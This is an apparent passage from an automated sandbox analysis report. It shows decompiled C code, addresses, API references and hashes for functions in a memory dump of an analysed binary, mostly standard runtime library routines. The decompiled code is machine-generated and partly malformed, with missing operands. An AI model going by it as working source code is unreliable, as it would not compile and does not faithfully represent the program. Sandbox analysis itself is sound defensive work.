							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(E00427D31() != 0) {
								E00421955(0);
								_t19 = _t26;
							} else {
								E00421955(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E00421955();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}

0x004290e9
0x004290eb
0x004290f1
0x004290f5
0x004290fd
0x00429102
0x00429110
0x00429113
0x0042911b
0x00429120
0x00429134
0x00429137
0x0042913a
0x0042914d
0x0042914e
0x00429151
0x00429152
0x00429155
0x00429156
0x00429157
0x00429162
0x0042916d
0x00429172
0x00429164
0x00429165
0x00429165
0x00429176
0x0042917c
0x0042913c
0x0042913c
0x00429143
0x00429149
0x00429149
0x00429122
0x00429123
0x00429129
0x00429129
0x0042917f
0x00429182

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004290EB

Part of subcall function 00427D31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004264E6,?,00000000,-00000008), ref: 00427DDD

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00429123
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00429143

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 14f98267f0a0e831571dd72c81147b71c8cf8b3e4259610969fd937c0f0f3997
Instruction ID: d3b774b84d90028c5ac06bfc672d72ef517ab5b7adc91b89351797ff02865a87
Opcode Fuzzy Hash: 14f98267f0a0e831571dd72c81147b71c8cf8b3e4259610969fd937c0f0f3997
Instruction Fuzzy Hash: E111A5F1705537BE77152B737C8DCBF6A6CDE86399790042BF40691101EA2C9D0185B9

Uniqueness

Uniqueness Score: -1.00%

Function 0042FF97 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042FF97(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x443a90, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0042FF80();
					E0042FF42();
					_t13 = WriteConsoleW( *0x443a90, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x0042ffb4
0x0042ffb8
0x0042ffc5
0x0042ffca
0x0042ffe5
0x0042ffe5
0x0042ffeb

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,0042C472,00000000,00000001,00000000,00000000,?,00421265,00000000,00000000,00000000), ref: 0042FFAE
GetLastError.KERNEL32(?,0042C472,00000000,00000001,00000000,00000000,?,00421265,00000000,00000000,00000000,00000000,00000000,?,00421823,00000000), ref: 0042FFBA

Part of subcall function 0042FF80: CloseHandle.KERNEL32(FFFFFFFE,0042FFCA,?,0042C472,00000000,00000001,00000000,00000000,?,00421265,00000000,00000000,00000000,00000000,00000000), ref: 0042FF90

___initconout.LIBCMT ref: 0042FFCA

Part of subcall function 0042FF42: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0042FF71,0042C45F,00000000,?,00421265,00000000,00000000,00000000,00000000), ref: 0042FF55

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,0042C472,00000000,00000001,00000000,00000000,?,00421265,00000000,00000000,00000000,00000000), ref: 0042FFDF

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: bf2e4416379429360feb3247554c5736a4e9051b5cfcbff7e55d51dfaefecf04
Instruction ID: e273299a1c226340d7e6ae76a81486f9c2cff00950df4c2c310153f616b4f000
Opcode Fuzzy Hash: bf2e4416379429360feb3247554c5736a4e9051b5cfcbff7e55d51dfaefecf04
Instruction Fuzzy Hash: D3F01236200129BBCF125FD1EC0898E3F76EF097B2B814071FA1D95530C6318964DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00407860 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 403
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00407860(void* __ebx, void* __edi, intOrPtr* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, signed char _a28, intOrPtr _a32) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				char _v88;
				char _v92;
				signed int _v96;
				char _v100;
				char _v104;
				char* _v116;
				void* _v124;
				void* __esi;
				void* __ebp;
				signed int _t173;
				signed int _t174;
				intOrPtr _t179;
				intOrPtr* _t192;
				intOrPtr* _t202;
				intOrPtr _t208;
				intOrPtr _t209;
				signed int _t211;
				intOrPtr* _t215;
				intOrPtr* _t220;
				char _t225;
				short* _t230;
				char* _t231;
				intOrPtr _t237;
				intOrPtr* _t244;
				intOrPtr* _t248;
				char _t265;
				void* _t276;
				intOrPtr _t278;
				intOrPtr* _t280;
				void* _t281;
				char _t282;
				intOrPtr* _t283;
				intOrPtr* _t284;
				intOrPtr* _t289;
				intOrPtr* _t290;
				intOrPtr _t292;
				intOrPtr _t295;
				intOrPtr _t296;
				intOrPtr _t301;
				char _t302;
				signed int _t304;
				void* _t312;
				intOrPtr _t315;
				intOrPtr* _t325;
				intOrPtr* _t326;
				void* _t327;
				intOrPtr* _t330;
				signed char _t334;
				signed char _t337;
				void* _t338;
				void* _t339;
				intOrPtr _t340;
				void* _t341;
				void* _t342;
				char _t344;
				void* _t345;
				char* _t346;
				char* _t354;
				signed int _t355;
				void* _t357;
				void* _t358;
				void* _t360;
				void* _t361;
				void* _t362;
				intOrPtr _t385;

				_push(0xffffffff);
				_push(0x431a65);
				_push( *[fs:0x0]);
				_t358 = _t357 - 0x58;
				_t173 =  *0x443048; // 0x35200185
				_t174 = _t173 ^ _t355;
				_v20 = _t174;
				_push(__ebx);
				_push(__edi);
				_push(_t174);
				 *[fs:0x0] =  &_v16;
				_t278 = _a32;
				_t282 = _a20;
				_t337 = _a28;
				_v104 = _a8;
				_v92 = _t282;
				_v96 = _t337;
				if(_t278 == 0) {
					L4:
					_t344 = 0;
				} else {
					_t276 =  *_t337;
					if(_t276 == 0x2b || _t276 == 0x2d) {
						_t344 = 1;
					} else {
						goto L4;
					}
				}
				_v80 = _t344;
				if(( *(_t282 + 0x14) & 0x00003000) == 0x3000) {
					_t12 = _t344 + 2; // 0x2
					_t179 = _t12;
					_t327 = "pP";
					if(_t179 <= _t278 &&  *((char*)(_t337 + _t344)) == 0x30) {
						_t282 =  *((intOrPtr*)(_t337 + _t344 + 1));
						if(_t282 == 0x78 || _t282 == 0x58) {
							_t344 = _t179;
							_v80 = _t344;
						}
					}
				} else {
					_t327 = "eE";
				}
				_v100 = E00418710(_t282, _t337, _t327);
				_v24 = 0x2e;
				_v24 =  *((intOrPtr*)( *((intOrPtr*)(E0041A69B(_t327, _t344)))));
				_t338 = E00418710(_t282, _t337,  &_v24);
				_t283 =  *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x30)) + 4));
				_v84 = _t283;
				 *((intOrPtr*)( *_t283 + 4))();
				_v8 = 0;
				_t192 = E00408230(_t278,  &_v88);
				_v8 = 0xffffffff;
				_t360 = _t358 + 0x14;
				_t284 = _v84;
				_v76 = _t192;
				if(_t284 != 0) {
					_t326 =  *((intOrPtr*)( *_t284 + 8))();
					if(_t326 != 0) {
						 *((intOrPtr*)( *_t326))(1);
					}
				}
				E00405CE0(_t278, _t327, _t278);
				_v8 = 1;
				_t195 =  >=  ? _v48 :  &_v48;
				 *((intOrPtr*)( *_v76 + 0x1c))(0);
				_t289 =  *((intOrPtr*)( *((intOrPtr*)(_v92 + 0x30)) + 4));
				_v84 = _t289;
				 *((intOrPtr*)( *_t289 + 4))();
				_v8 = 2;
				_t202 = E004088A0(_t278, _t338, _t344,  &_v88, _v96, _t278 + _v96,  >=  ? _v48 :  &_v48);
				_v8 = 1;
				_t361 = _t360 + 4;
				_t330 = _v84;
				_t290 = _t202;
				_v76 = _t290;
				if(_t330 != 0) {
					_t325 =  *((intOrPtr*)( *_t330 + 8))();
					if(_t325 != 0) {
						 *((intOrPtr*)( *_t325))(1);
					}
					_t290 = _v76;
				}
				 *((intOrPtr*)( *_t290 + 0x14))( &_v72);
				_v8 = 3;
				_v96 =  *((intOrPtr*)( *((intOrPtr*)( *_v76 + 0x10))))();
				if(_t338 != _t278) {
					_t265 =  *((intOrPtr*)( *((intOrPtr*)( *_v76 + 0xc))))();
					_t267 =  >=  ? _v48 :  &_v48;
					 *((char*)(( >=  ? _v48 :  &_v48) + _t338)) = _t265;
				}
				_t339 =  ==  ? _v100 : _t338;
				_t280 =  >=  ? _v72 :  &_v72;
				_t208 =  *_t280;
				if(_t208 == 0x7f) {
					L29:
					_t292 = _v92;
					_t209 = _v32;
					_v80 = _t209;
					_t385 =  *((intOrPtr*)(_t292 + 0x24));
					_t340 =  *((intOrPtr*)(_t292 + 0x20));
					if(_t385 < 0 || _t385 <= 0 && _t340 == 0 || _t340 <= _t209) {
						_t341 = 0;
					} else {
						_t341 = _t340 - _t209;
					}
					_t280 = _a4;
					_t211 =  *(_t292 + 0x14) & 0x000001c0;
					if(_t211 == 0x40) {
						_t213 =  >=  ? _v48 :  &_v48;
						_t215 = E00407400(_t292, _t280,  &_v88, _a12, _a16,  >=  ? _v48 :  &_v48, _t344);
						_t362 = _t361 + 0x18;
					} else {
						if(_t211 == 0x100) {
							_t242 =  >=  ? _v48 :  &_v48;
							_t244 = E00407400(_t292, _t280,  &_v88, _a12, _a16,  >=  ? _v48 :  &_v48, _t344);
							_a16 =  *((intOrPtr*)(_t244 + 4));
							_a12 =  *_t244;
							_t215 = E00407390(_t280,  &_v88,  *_t244,  *((intOrPtr*)(_t244 + 4)), _a24, _t341);
							_t362 = _t361 + 0x30;
							_t341 = 0;
						} else {
							_t248 = E00407390(_t280,  &_v88, _a12, _a16, _a24, _t341);
							_t341 = 0;
							_t250 =  >=  ? _v48 :  &_v48;
							_a12 =  *_t248;
							_a16 =  *((intOrPtr*)(_t248 + 4));
							_t215 = E00407400( *((intOrPtr*)(_t248 + 4)), _t280,  &_v88,  *_t248,  *((intOrPtr*)(_t248 + 4)),  >=  ? _v48 :  &_v48, _t344);
							_t362 = _t361 + 0x30;
						}
					}
					_a12 =  *_t215;
					_t217 =  >=  ? _v48 :  &_v48;
					_v80 = _v80 - _t344;
					_t218 = ( >=  ? _v48 :  &_v48) + _t344;
					_a16 =  *((intOrPtr*)(_t215 + 4));
					_t220 = E00407400( *((intOrPtr*)(_t215 + 4)), _t280,  &_v88,  *_t215,  *((intOrPtr*)(_t215 + 4)), ( >=  ? _v48 :  &_v48) + _t344, _v80);
					_t333 = _v92;
					_t344 = _v104;
					_a12 =  *_t220;
					_a16 =  *((intOrPtr*)(_t220 + 4));
					 *((intOrPtr*)(_t333 + 0x20)) = 0;
					 *((intOrPtr*)(_t333 + 0x24)) = 0;
					E00407390(_t280, _t344,  *_t220,  *((intOrPtr*)(_t220 + 4)), _a24, _t341);
					_t295 = _v52;
					_t361 = _t362 + 0x30;
					if(_t295 < 0x10) {
						L44:
						_t296 = _v28;
						_v56 = 0;
						_v52 = 0xf;
						_v72 = 0;
						if(_t296 < 0x10) {
							L48:
							 *[fs:0x0] = _v16;
							_pop(_t342);
							_pop(_t345);
							_pop(_t281);
							return E0041361E(_t344, _t281, _v20 ^ _t355, _t333, _t342, _t345);
						} else {
							_t333 = _v48;
							_t301 = _t296 + 1;
							_t225 = _v48;
							if(_t301 < 0x1000) {
								L47:
								_push(_t301);
								E004138AD(_t333);
								goto L48;
							} else {
								_t333 =  *((intOrPtr*)(_t225 - 4));
								_t301 = _t301 + 0x23;
								if(_t225 -  *((intOrPtr*)(_t225 - 4)) + 0xfffffffc > 0x1f) {
									goto L50;
								} else {
									goto L47;
								}
							}
						}
					} else {
						_t333 = _v72;
						_t312 = _t295 + 1;
						_t237 = _v72;
						if(_t312 < 0x1000) {
							L43:
							_push(_t312);
							E004138AD(_t333);
							_t361 = _t361 + 8;
							goto L44;
						} else {
							_t333 =  *((intOrPtr*)(_t237 - 4));
							_t301 = _t312 + 0x23;
							if(_t237 -  *((intOrPtr*)(_t237 - 4)) + 0xfffffffc > 0x1f) {
								goto L50;
							} else {
								goto L43;
							}
						}
					}
				} else {
					while(_t208 > 0) {
						_t315 = _t208;
						if(_t315 >= _t339 - _t344) {
							goto L29;
						} else {
							_t339 = _t339 - _t315;
							_t301 = _v32;
							if(_t301 < _t339) {
								E00408220(_t280);
								L50:
								E0041805F(_t280, _t301, _t333);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t355);
								_t334 =  *(_t361 + 0x14);
								_push(_t344);
								_t346 = _v116;
								 *_t346 = 0x25;
								_t230 = _t346 + 1;
								if((_t334 & 0x00000020) != 0) {
									 *_t230 = 0x2b;
									_t230 = _t230 + 1;
								}
								if((_t334 & 0x00000010) != 0) {
									 *_t230 = 0x23;
									_t230 = _t230 + 1;
								}
								_t302 = _a8;
								 *_t230 = 0x2a2e;
								_t231 = _t230 + 2;
								if(_t302 != 0) {
									 *_t231 = _t302;
									_t231 = _t231 + 1;
								}
								_t304 = _t334 & 0x00003000;
								if((_t334 & 0x00000004) == 0) {
									if(_t304 != 0x2000) {
										if(_t304 != 0x3000) {
											 *_t231 = 0x65 + (_t304 & 0xffffff00 | _t304 != 0x00001000) * 2;
											 *((char*)(_t231 + 1)) = 0;
											return _t346;
										} else {
											 *_t231 = 0x61;
											 *((char*)(_t231 + 1)) = 0;
											return _t346;
										}
									} else {
										goto L63;
									}
								} else {
									if(_t304 == 0x2000) {
										L63:
										 *_t231 = 0x66;
										 *((char*)(_t231 + 1)) = 0;
										return _t346;
									} else {
										if(_t304 != 0x3000) {
											 *_t231 = 0x45 + (_t304 & 0xffffff00 | _t304 != 0x00001000) * 2;
											 *((char*)(_t231 + 1)) = 0;
											return _t346;
										} else {
											 *_t231 = 0x41;
											 *((char*)(_t231 + 1)) = 0;
											return _t346;
										}
									}
								}
							} else {
								_t333 = _v28;
								if(_v28 - _t301 < 1) {
									_push(_v96);
									_v100 = 0;
									L00408B80(_t280,  &_v48, _t339, _t344, 1, _v100, _t339, 1);
								} else {
									_v32 = _t301 + 1;
									_t353 =  >=  ? _v48 :  &_v48;
									_t354 = ( >=  ? _v48 :  &_v48) + _t339;
									E00414BF0(_t354 + 1, _t354, _t301 - _t339 + 1);
									_t361 = _t361 + 0xc;
									 *_t354 = _v96 << 0x00000008 | _v96 & 0x000000ff;
									_t344 = _v80;
								}
								_t280 =  >  ? _t280 + 1 : _t280;
								_t208 =  *_t280;
								if(_t208 != 0x7f) {
									continue;
								} else {
									goto L29;
								}
							}
						}
						goto L67;
					}
					goto L29;
				}
				L67:
			}

0x00407863
0x00407865
0x00407870
0x00407871
0x00407874
0x00407879
0x0040787b
0x0040787e
0x00407880
0x00407881
0x00407885
0x0040788b
0x00407891
0x00407894
0x00407897
0x0040789a
0x0040789d
0x004078a2
0x004078b5
0x004078b5
0x004078a4
0x004078a4
0x004078a8
0x004078ae
0x00000000
0x00000000
0x00000000
0x004078a8
0x004078bf
0x004078c7
0x004078d0
0x004078d0
0x004078d3
0x004078da
0x004078e2
0x004078e9
0x004078f0
0x004078f2
0x004078f2
0x004078e9
0x004078c9
0x004078c9
0x004078c9
0x004078fc
0x00407904
0x00407911
0x0040791e
0x00407929
0x0040792c
0x00407931
0x00407937
0x0040793f
0x00407944
0x0040794b
0x0040794e
0x00407951
0x00407956
0x0040795d
0x00407961
0x00407967
0x00407967
0x00407961
0x0040796f
0x0040797d
0x00407988
0x00407997
0x004079a0
0x004079a3
0x004079a8
0x004079ae
0x004079b3
0x004079b8
0x004079bc
0x004079bf
0x004079c2
0x004079c4
0x004079c9
0x004079d2
0x004079d6
0x004079dc
0x004079dc
0x004079de
0x004079de
0x004079e7
0x004079ed
0x004079f8
0x004079fd
0x00407a07
0x00407a12
0x00407a18
0x00407a18
0x00407a1b
0x00407a26
0x00407a2a
0x00407a2e
0x00407ac3
0x00407ac3
0x00407ac6
0x00407ac9
0x00407acc
0x00407ad0
0x00407ad3
0x00407ae3
0x00407adf
0x00407adf
0x00407adf
0x00407ae8
0x00407aeb
0x00407af3
0x00407b86
0x00407b96
0x00407b9b
0x00407af9
0x00407afe
0x00407b47
0x00407b57
0x00407b66
0x00407b6f
0x00407b72
0x00407b77
0x00407b7a
0x00407b00
0x00407b0f
0x00407b14
0x00407b23
0x00407b2d
0x00407b32
0x00407b35
0x00407b3a
0x00407b3a
0x00407afe
0x00407baa
0x00407bad
0x00407bb1
0x00407bb4
0x00407bb9
0x00407bc4
0x00407bc9
0x00407bcc
0x00407bd8
0x00407bdf
0x00407be2
0x00407be9
0x00407bf0
0x00407bf5
0x00407bf8
0x00407bfe
0x00407c28
0x00407c28
0x00407c2b
0x00407c32
0x00407c39
0x00407c40
0x00407c6a
0x00407c6f
0x00407c77
0x00407c78
0x00407c79
0x00407c87
0x00407c42
0x00407c42
0x00407c45
0x00407c46
0x00407c4e
0x00407c60
0x00407c60
0x00407c62
0x00000000
0x00407c50
0x00407c50
0x00407c53
0x00407c5e
0x00000000
0x00000000
0x00000000
0x00000000
0x00407c5e
0x00407c4e
0x00407c00
0x00407c00
0x00407c03
0x00407c04
0x00407c0c
0x00407c1e
0x00407c1e
0x00407c20
0x00407c25
0x00000000
0x00407c0e
0x00407c0e
0x00407c11
0x00407c1c
0x00000000
0x00000000
0x00000000
0x00000000
0x00407c1c
0x00407c0c
0x00407a34
0x00407a34
0x00407a3c
0x00407a45
0x00000000
0x00407a47
0x00407a47
0x00407a49
0x00407a4e
0x00407c88
0x00407c8d
0x00407c8d
0x00407c92
0x00407c93
0x00407c94
0x00407c95
0x00407c96
0x00407c97
0x00407c98
0x00407c99
0x00407c9a
0x00407c9b
0x00407c9c
0x00407c9d
0x00407c9e
0x00407c9f
0x00407ca0
0x00407ca3
0x00407ca6
0x00407ca7
0x00407caa
0x00407cad
0x00407cb3
0x00407cb5
0x00407cb8
0x00407cb8
0x00407cbc
0x00407cbe
0x00407cc1
0x00407cc1
0x00407cc2
0x00407cc5
0x00407cca
0x00407ccf
0x00407cd1
0x00407cd3
0x00407cd3
0x00407cd6
0x00407cdf
0x00407d1f
0x00407d34
0x00407d53
0x00407d55
0x00407d5d
0x00407d36
0x00407d38
0x00407d3a
0x00407d42
0x00407d42
0x00000000
0x00000000
0x00000000
0x00407ce1
0x00407ce7
0x00407d21
0x00407d23
0x00407d25
0x00407d2d
0x00407ce9
0x00407cef
0x00407d0e
0x00407d10
0x00407d18
0x00407cf1
0x00407cf3
0x00407cf5
0x00407cfd
0x00407cfd
0x00407cef
0x00407ce7
0x00407a54
0x00407a54
0x00407a5e
0x00407a98
0x00407a9b
0x00407aaa
0x00407a60
0x00407a69
0x00407a6c
0x00407a72
0x00407a7b
0x00407a84
0x00407a91
0x00407a93
0x00407a93
0x00407ab6
0x00407ab9
0x00407abd
0x00000000
0x00000000
0x00000000
0x00000000
0x00407abd
0x00407a4e
0x00000000
0x00407a45
0x00000000
0x00407a34
0x00000000

APIs

_strcspn.LIBCMT ref: 004078F7
_strcspn.LIBCMT ref: 00407919

Strings

+a@, xrefs: 0040787E

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: _strcspn
String ID: +a@
API String ID: 3709121408-3244518245
Opcode ID: 5dc103e995ad51b90a74068801d0c7faf9d8e422bdfaf702c370d30785652b9b
Instruction ID: 508c6d915f9254a6b0e9845a21f0e11d85ce9535701cc70608269ce45632ccfa
Opcode Fuzzy Hash: 5dc103e995ad51b90a74068801d0c7faf9d8e422bdfaf702c370d30785652b9b
Instruction Fuzzy Hash: 72E1AE71E042499FDF04DFA8C884AEEBBB5EF49304F14806AE815BB391D738E945CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041CFDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0041D06D

Strings

pow, xrefs: 0041D045, 0041D062

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 53a87f3bb7df7e35730d172635f75f797c4e2345677e7362e84e52001b1ca687
Instruction ID: 8d7ce4bedb2077184ed2a48982ab9f327208b51c00b579dbadb4d7d4ca4bc968
Opcode Fuzzy Hash: 53a87f3bb7df7e35730d172635f75f797c4e2345677e7362e84e52001b1ca687
Instruction Fuzzy Hash: C4515BF1F0C50296CB117B28E9413AB6F90DB84754F70896FE0D5423A9EB3D9CC69A4E

Uniqueness

Uniqueness Score: -1.00%

Function 00403910 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E00403910(void* __ebx, intOrPtr* __ecx) {
				char _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				char _v24;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v60;
				void* _v76;
				void* _v104;
				intOrPtr _v112;
				void* _v128;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t53;
				signed int _t59;
				void* _t62;
				void* _t73;
				intOrPtr* _t76;
				intOrPtr _t80;
				void* _t83;
				signed char _t85;
				intOrPtr* _t86;
				intOrPtr* _t88;
				intOrPtr _t91;
				intOrPtr* _t93;
				char* _t100;
				intOrPtr _t101;
				signed int _t105;
				signed int _t107;
				void* _t111;
				signed int _t114;
				signed int _t115;
				void* _t120;

				_t73 = _t111;
				_t114 = (_t111 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t73 + 4));
				_t105 = _t114;
				_push(0xffffffff);
				_push(0x43156d);
				_push( *[fs:0x0]);
				_push(_t73);
				_t115 = _t114 - 0x20;
				_t42 =  *0x443048; // 0x35200185
				_push(_t42 ^ _t105);
				 *[fs:0x0] =  &_v24;
				_t96 = __ecx;
				_v32 = __ecx;
				_t45 =  *((intOrPtr*)(_t73 + 0xc));
				asm("xorps xmm0, xmm0");
				_t88 =  *((intOrPtr*)(_t73 + 8));
				_t76 = _t88;
				_v32 = __ecx;
				asm("movups [ebp-0x30], xmm0");
				_t91 =  *_t45;
				_v32 =  *((intOrPtr*)(_t45 + 4));
				_v44 = 0;
				_v40 = 0;
				_v36 = _t76 + 1;
				do {
					_t48 =  *_t76;
					_t76 = _t76 + 1;
				} while (_t48 != 0);
				_push(_t76 - _v36);
				_push(_t88);
				E00402830(_t73,  &_v60, _t88, _t91, __ecx);
				_v16 = 0;
				_push( &_v60);
				_push(_v32);
				E00402FD0(_t73, __ecx, _t88, _t91, _t91);
				_t80 = _v40;
				if(_t80 < 0x10) {
					L6:
					 *_t96 = 0x4345d0;
					 *[fs:0x0] = _v24;
					return _t96;
				} else {
					_t89 = _v60;
					_t83 = _t80 + 1;
					_t53 = _v60;
					if(_t83 < 0x1000) {
						L5:
						_push(_t83);
						E004138AD(_t89);
						goto L6;
					} else {
						_t89 =  *((intOrPtr*)(_t53 - 4));
						_t83 = _t83 + 0x23;
						if(_t53 -  *((intOrPtr*)(_t53 - 4)) + 0xfffffffc > 0x1f) {
							E0041805F(_t73, _t83, _t89);
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t105);
							_t107 = _t115;
							_t120 = (_t115 & 0xfffffff8) - 0x1c;
							_t59 = _v60 & 0x00000017;
							 *(_t83 + 0xc) = _t59;
							_push(__ecx);
							_t85 =  *(_t83 + 0x10) & _t59;
							if(_t85 == 0) {
								return _t59;
							} else {
								if(_v4 != 0) {
									E00414B7B(0, 0);
								}
								if((_t85 & 0x00000004) == 0) {
									_t100 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
								} else {
									_t100 = "ios_base::badbit set";
								}
								_t62 = E00402FB0(_t120 + 4, 1);
								_t86 = _t120 + 0x14;
								_push(_t62);
								E00403910(_t73, _t86, _t100);
								E00414B7B(_t120 + 0x18, 0x4422f0);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t107);
								_push(_t100);
								_t101 = _v112;
								asm("xorps xmm0, xmm0");
								_push(_t91);
								_t93 = _t86;
								 *_t93 = 0x433244;
								asm("movq [eax], xmm0");
								E00414631(_t101 + 4, _t93 + 4);
								 *_t93 = 0x43459c;
								 *((intOrPtr*)(_t93 + 0xc)) =  *((intOrPtr*)(_t101 + 0xc));
								 *((intOrPtr*)(_t93 + 0x10)) =  *((intOrPtr*)(_t101 + 0x10));
								 *_t93 = 0x4345d0;
								return _t93;
							}
						} else {
							goto L5;
						}
					}
				}
			}

0x00403911
0x00403919
0x00403920
0x00403924
0x00403926
0x00403928
0x00403933
0x00403934
0x00403935
0x0040393a
0x00403941
0x00403945
0x0040394b
0x0040394d
0x00403950
0x00403953
0x00403956
0x00403959
0x0040395b
0x0040395e
0x00403962
0x00403967
0x0040396d
0x00403974
0x0040397b
0x00403980
0x00403980
0x00403982
0x00403983
0x0040398a
0x0040398b
0x0040398f
0x00403997
0x0040399e
0x0040399f
0x004039a5
0x004039aa
0x004039b0
0x004039da
0x004039da
0x004039e5
0x004039f5
0x004039b2
0x004039b2
0x004039b5
0x004039b6
0x004039be
0x004039d0
0x004039d0
0x004039d2
0x00000000
0x004039c0
0x004039c0
0x004039c3
0x004039ce
0x004039f8
0x004039fd
0x004039fe
0x004039ff
0x00403a00
0x00403a01
0x00403a09
0x00403a0c
0x00403a0f
0x00403a15
0x00403a16
0x00403a18
0x00403a26
0x00403a1a
0x00403a1e
0x00403a2d
0x00403a2d
0x00403a35
0x00403a4b
0x00403a37
0x00403a37
0x00403a37
0x00403a55
0x00403a5d
0x00403a61
0x00403a63
0x00403a72
0x00403a77
0x00403a78
0x00403a79
0x00403a7a
0x00403a7b
0x00403a7c
0x00403a7d
0x00403a7e
0x00403a7f
0x00403a80
0x00403a83
0x00403a84
0x00403a87
0x00403a8a
0x00403a8b
0x00403a91
0x00403a97
0x00403a9f
0x00403aa4
0x00403ab3
0x00403ab8
0x00403abb
0x00403ac4
0x00403ac4
0x00000000
0x00000000
0x00000000
0x004039ce
0x004039be

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00403A9F

Part of subcall function 00414B7B: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,004123EF,?,00441908,00402904,string too long,00402904,?,?,?), ref: 00414BDB

Strings

ios_base::badbit set, xrefs: 00403A37, 00403A62, 00403A83
ios_base::failbit set, xrefs: 00403938

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 679b19d6526c42d3fef2e77a593f1b5c19d424eca2adc12c72b18571d7f0ea98
Instruction ID: dff861e1577ca60c34eef900b601ccfe213b4d2046d6d65c0aa6cf5fb82dfb42
Opcode Fuzzy Hash: 679b19d6526c42d3fef2e77a593f1b5c19d424eca2adc12c72b18571d7f0ea98
Instruction Fuzzy Hash: A651EAB1910208ABC704DF59CC41B9AFBF8EF49710F14862FF954A77C1E778AA448B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041710F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E0041710F(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
